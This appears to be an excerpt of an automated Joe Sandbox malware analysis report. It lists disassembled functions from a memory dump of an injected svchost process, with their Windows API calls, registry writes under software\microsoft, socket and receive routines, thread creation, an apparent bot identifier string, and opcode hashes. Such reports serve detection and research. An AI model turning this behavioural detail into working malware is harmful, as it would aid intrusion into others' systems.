                                                                                                                                                                                                                    • Instruction ID: 624dc36d533c102a67ddf76a704838ae94d69d864442ab1e9e144c3c66c6519f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 70f9fc3143bf534cca684f0e4e89fc85c5a61feea77cab146b802c1c70a26e28
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B41B975E40208EFDB40DFA9D884AEDBBF5FB88351F51456AE904E7200E774AA01CF90
                                                                                                                                                                                                                    Function 02C75200 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97synchronizationCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C75218
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C75249
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C75275
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7529C
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(000002C4,000003E8), ref: 02C752CD
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(000002C4), ref: 02C752EE
                                                                                                                                                                                                                    • SetLastError.KERNEL32(?), ref: 02C752F8
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: QueryVirtual$ErrorLast$MutexObjectReleaseSingleWait
                                                                                                                                                                                                                    • String ID: P0#v
                                                                                                                                                                                                                    • API String ID: 2971961948-3387790918
                                                                                                                                                                                                                    • Opcode ID: ce913c20827457bea48ee1bafbd5fd172c027c311be6c2699a490eb7730b090c
                                                                                                                                                                                                                    • Instruction ID: 30c5bc5ae0f3d323f0229e5c14f4cc7f50c54d2b51a2aeee4670010bc99a5d1c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce913c20827457bea48ee1bafbd5fd172c027c311be6c2699a490eb7730b090c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB31B5B5E40258AFDB40DFE9D884ADDBBF9FB48310F50856AE918E7240E7749A11CF90
                                                                                                                                                                                                                    Function 02C806F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 95registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C80710
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C8072E
                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000102,-80000001,?,?,?,?,?,?,0000001C,00000000), ref: 02C807CD
                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(-80000001,80F50209a,00000000,00000001,?,00000104,?,?,?,?,0000001C,00000000), ref: 02C807EF
                                                                                                                                                                                                                    • RegFlushKey.ADVAPI32(-80000001,?,?,?,?,0000001C,00000000), ref: 02C807FD
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(-80000001,?,?,?,?,0000001C,00000000), ref: 02C80810
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$CloseFlushOpenValue
                                                                                                                                                                                                                    • String ID: 80F50209a$software\microsoft
                                                                                                                                                                                                                    • API String ID: 2470402893-520226336
                                                                                                                                                                                                                    • Opcode ID: 3fc1bccc21e8b7fb971e5db50c4987e6af6c69b5ce80e0ac5938bc282a744586
                                                                                                                                                                                                                    • Instruction ID: fcc44ad502bfe9a342a1e66f398fc18f980509a9af6c2acc1215a477518a3881
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fc1bccc21e8b7fb971e5db50c4987e6af6c69b5ce80e0ac5938bc282a744586
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF31F870A04248AFEB15EB74DC88FEE77A9DF54708F1085A8E585D7141E6709EC98B90
                                                                                                                                                                                                                    Function 02C8AB20 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 92threadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\private\), ref: 02C8AB49
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8AAF0,00000000,00000000,00000000), ref: 02C8AB96
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\public\), ref: 02C8ABAE
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8AAD0,00000000,00000000,00000000), ref: 02C8ABF2
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8AC0A
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8AC1B
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateHandleThread$CloseInformation
                                                                                                                                                                                                                    • String ID: \private\$\public\
                                                                                                                                                                                                                    • API String ID: 677819612-281496920
                                                                                                                                                                                                                    • Opcode ID: 0a4440110d42e8da86999d1edf3a9dac1824afa8cb82750815a93b5b3e5396a2
                                                                                                                                                                                                                    • Instruction ID: 459944f8d6a44322f75390ca40d196e11bb48cfee441a594600555a0848a885f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a4440110d42e8da86999d1edf3a9dac1824afa8cb82750815a93b5b3e5396a2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 493109309817149FE7216B14EC09BA67758DF81B0DF14C65BEA055B2C0C7B59648DFD4
                                                                                                                                                                                                                    Function 02C7D200 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 02C7D21B
                                                                                                                                                                                                                    • GetLastActivePopup.USER32(?), ref: 02C7D229
                                                                                                                                                                                                                    • GetWindow.USER32(00000000,00000005), ref: 02C7D243
                                                                                                                                                                                                                    • GetWindow.USER32(00000000), ref: 02C7D246
                                                                                                                                                                                                                    • GetWindowInfo.USER32(00000000,?), ref: 02C7D25C
                                                                                                                                                                                                                    • GetWindow.USER32(00000000,00000004), ref: 02C7D265
                                                                                                                                                                                                                    • GetWindow.USER32(00000000,00000003), ref: 02C7D29E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$ActiveInfoLastLongPopup
                                                                                                                                                                                                                    • String ID: <
                                                                                                                                                                                                                    • API String ID: 3748940024-4251816714
                                                                                                                                                                                                                    • Opcode ID: 6566fcbd06473202438ac9c479076b65a869ccce2ce16732eb24cbd94813201e
                                                                                                                                                                                                                    • Instruction ID: ad51b8ab07b6a8a0a47f95f8dc24954f2c3c838c14de4cce43531096e268ba51
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6566fcbd06473202438ac9c479076b65a869ccce2ce16732eb24cbd94813201e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B110B71A4061516DB22A9699CC9FAFBB5CEFD1354F040665FE02F3180DB60DE428BA0
                                                                                                                                                                                                                    Function 02C7C910 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 53synchronizationthreadwindowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C7C8E0,00000000,00000000,00000000), ref: 02C7C924
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000,?,?,02C78DCA,?,?,?,?,02C78F99,00000000,?,?,?,?,02C78500), ref: 02C7C93C
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,02C78DCA,?,?,?,?,02C78F99,00000000,?,?,?,?,02C78500,?), ref: 02C7C94D
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,02C78DCA,?,?,?,?,02C78F99,00000000,?,?,?,?,02C78500), ref: 02C7C95C
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C7C990
                                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 02C7C997
                                                                                                                                                                                                                    • PostMessageA.USER32(?,00000215,00000000,00000000), ref: 02C7C9AB
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$CloseCreateInformationMessageMutexObjectPostReleaseSingleThreadWaitWindow
                                                                                                                                                                                                                    • String ID: P0#v
                                                                                                                                                                                                                    • API String ID: 731183410-3387790918
                                                                                                                                                                                                                    • Opcode ID: 898a5462f15b66eb5b6a881246f3b77817fdb00d5b63b46bcc56904acff011f1
                                                                                                                                                                                                                    • Instruction ID: dc847c986a7579aa9beb734f0ddc6753ee581b3efceb7b23b13afb8658165d64
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 898a5462f15b66eb5b6a881246f3b77817fdb00d5b63b46bcc56904acff011f1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE11C830E81315BBE7129F60EC0EF9A3BA8AF45714F1447A5FA149B2C1D7B46710CB94
                                                                                                                                                                                                                    Function 02C7E629 Relevance: 13.9, APIs: 11, Instructions: 128memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • StrCmpNIA.SHLWAPI(?,?,?,?,?,00000000,?,?,?), ref: 02C7E682
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?), ref: 02C7E6A8
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C7E6AF
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C7E6BF
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?), ref: 02C7E6CA
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?), ref: 02C7E6F9
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?), ref: 02C7E71A
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C7E72E
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C7E735
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C7E745
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C7E74C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Processmemcpy$AllocFreeValidatememset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3046854561-0
                                                                                                                                                                                                                    • Opcode ID: 5b0fbf8ba9562c60eabc5b2ff01147ac1f240071a9423b54da6d1d5d7f771d8b
                                                                                                                                                                                                                    • Instruction ID: baf61d12eb0f15fbd5b52be9291bc4ea2e7b6454b2ad0f81c5b671b051dd4de9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b0fbf8ba9562c60eabc5b2ff01147ac1f240071a9423b54da6d1d5d7f771d8b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF41A477E00359ABCF22CFA4CC84BEE7BB9EF85304F144599E9459B241D730AA40CBA1
                                                                                                                                                                                                                    Function 02C729B0 Relevance: 13.7, APIs: 9, Instructions: 198COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: callocexitfree
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3367576030-0
                                                                                                                                                                                                                    • Opcode ID: bbcff4de4a4894e0a6d107a95d912f7d4d6b507eb13154987a22060052d57127
                                                                                                                                                                                                                    • Instruction ID: 9e9d0ca8c05ed3c8b7aa55220ca6670d6b8bda956e2584675a14374352471800
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bbcff4de4a4894e0a6d107a95d912f7d4d6b507eb13154987a22060052d57127
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1961A475A00609AFEB20DF69C880BAEB7B5FF88314F148459ED0697340D771EA51CF92
                                                                                                                                                                                                                    Function 02C9C140 Relevance: 13.7, APIs: 9, Instructions: 191fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: free$malloc$CloseFileHandleReadselect
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 158848325-0
                                                                                                                                                                                                                    • Opcode ID: fe96fb7445081e0d6b7b4217289d3908891c8ab8d549666e3766b5898d1a3772
                                                                                                                                                                                                                    • Instruction ID: 700ab6dcdf6e10d77520856caff018f3a20b3bd56e95b8683181c0d6a86973f5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe96fb7445081e0d6b7b4217289d3908891c8ab8d549666e3766b5898d1a3772
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2351C771D00659ABDB10CFA99C88BFFB7F8EB88724F14056AE51DD7280D631AB018B91
                                                                                                                                                                                                                    Function 02C98890 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 226timeCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 02C9EAA0: select.WS2_32(?,?,00000000,00000000,?), ref: 02C9EB27
                                                                                                                                                                                                                      • Part of subcall function 02C9EAA0: __WSAFDIsSet.WS2_32(?,?), ref: 02C9EB58
                                                                                                                                                                                                                      • Part of subcall function 02C9EAA0: recv.WS2_32(?,?,00000005,00000000), ref: 02C9EB7B
                                                                                                                                                                                                                      • Part of subcall function 02C9EAA0: recv.WS2_32(?,?,00000004,00000000), ref: 02C9EB9D
                                                                                                                                                                                                                      • Part of subcall function 02C9EAA0: socket.WS2_32(00000002,00000001,00000000), ref: 02C9EBB6
                                                                                                                                                                                                                      • Part of subcall function 02C9EAA0: setsockopt.WS2_32(00000000,00000006,00000001,00000001,00000004), ref: 02C9EBD2
                                                                                                                                                                                                                    • malloc.MSVCRT ref: 02C988B3
                                                                                                                                                                                                                    • GetSystemTime.KERNEL32(?), ref: 02C98987
                                                                                                                                                                                                                    • GetSystemTime.KERNEL32(?), ref: 02C989D2
                                                                                                                                                                                                                    • GetSystemTime.KERNEL32(00000000,?), ref: 02C98A64
                                                                                                                                                                                                                    • GetSystemTime.KERNEL32(user!226533!1CE3AAD1,?), ref: 02C98AB2
                                                                                                                                                                                                                    • free.MSVCRT ref: 02C98B6F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: SystemTime$recv$freemallocselectsetsockoptsocket
                                                                                                                                                                                                                    • String ID: user!226533!1CE3AAD1
                                                                                                                                                                                                                    • API String ID: 2153857484-4071781050
                                                                                                                                                                                                                    • Opcode ID: 49f1d266871a2e713ea10d1f790a0fcbf5d4a49dcbe9e1e26214910ee85b388a
                                                                                                                                                                                                                    • Instruction ID: c92b1d76400ef9843e2e8b4eed5cff5ffa8c5a4895de51623a914c03a3318989
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49f1d266871a2e713ea10d1f790a0fcbf5d4a49dcbe9e1e26214910ee85b388a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C91BF71A006558FDF28CF28C4987BEBBE5BB86304F04476EE5969B681E734E681CB50
                                                                                                                                                                                                                    Function 02C899D0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 98libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C899E7
                                                                                                                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 02C89A0A
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02C89ADB
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02C89AEC
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000), ref: 02C89AFC
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressCurrentHandleModuleProcProcessVersionmemset
                                                                                                                                                                                                                    • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                                    • API String ID: 877405840-3024904723
                                                                                                                                                                                                                    • Opcode ID: 2d8e0a6a8fff08f23e0aad92f46895f996e6a680ca94b2f21621046ed013eb6d
                                                                                                                                                                                                                    • Instruction ID: ab2509dac45ebc24982450debd88eb51baa31cac6808634e6fc844e1ce05eae6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d8e0a6a8fff08f23e0aad92f46895f996e6a680ca94b2f21621046ed013eb6d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F316B30A80119ABDF39EE55C895BF973B9EF4630CF5085A9D50697340EB719B90CA81
                                                                                                                                                                                                                    Function 02C77890 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90synchronizationCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GdiFlush.GDI32(?,?,?), ref: 02C77926
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C77934
                                                                                                                                                                                                                    • IsBadWritePtr.KERNEL32(?,?), ref: 02C7794A
                                                                                                                                                                                                                    • IsBadReadPtr.KERNEL32(00000000,?), ref: 02C77956
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?), ref: 02C77963
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C77985
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FlushMutexObjectReadReleaseSingleWaitWritememcpy
                                                                                                                                                                                                                    • String ID: P0#v
                                                                                                                                                                                                                    • API String ID: 3485819771-3387790918
                                                                                                                                                                                                                    • Opcode ID: 8171cd07da8917a43439a99d2a7210e13dec6fc51a1ddb171d100cc1c6730262
                                                                                                                                                                                                                    • Instruction ID: 724dfa19468e913fa4ed040b0bc688f067e8746fae3b6580ec2c130846e12548
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8171cd07da8917a43439a99d2a7210e13dec6fc51a1ddb171d100cc1c6730262
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE31CA32E411099BCB15CF69D984BAABBB5EFC8354F2885A9EC04D7305D730E955CB90
                                                                                                                                                                                                                    Function 02C7AB21 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46synchronizationthreadwindowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 02C7AB2F
                                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 02C7AB54
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7AB62
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32 ref: 02C7AB97
                                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 02C7AB9E
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 02C7ABAE
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$CurrentMessageMutexObjectReleaseSendSingleThreadWait
                                                                                                                                                                                                                    • String ID: P0#v
                                                                                                                                                                                                                    • API String ID: 1675675969-3387790918
                                                                                                                                                                                                                    • Opcode ID: d5d136a4041b7d436f771182aacef41972af81b25510e3df2a3fb617409e179f
                                                                                                                                                                                                                    • Instruction ID: 03f074cc63b41d1f3aab212351704ecd20f5acd8214eb696ac11eda72c1c52d8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5d136a4041b7d436f771182aacef41972af81b25510e3df2a3fb617409e179f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 35012431A81250AFCB029B24FC08FDE33A4BF84724F050BF5E8448B282D7B5A9428BC0
                                                                                                                                                                                                                    Function 02C7A9A0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 37synchronizationthreadwindowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 02C7A9AD
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7A9CB
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32 ref: 02C7AA00
                                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 02C7AA07
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 02C7AA1B
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000005), ref: 02C7AA2A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CurrentErrorLastMessageMutexObjectReleaseSendSingleThreadWaitWindow
                                                                                                                                                                                                                    • String ID: P0#v
                                                                                                                                                                                                                    • API String ID: 699575883-3387790918
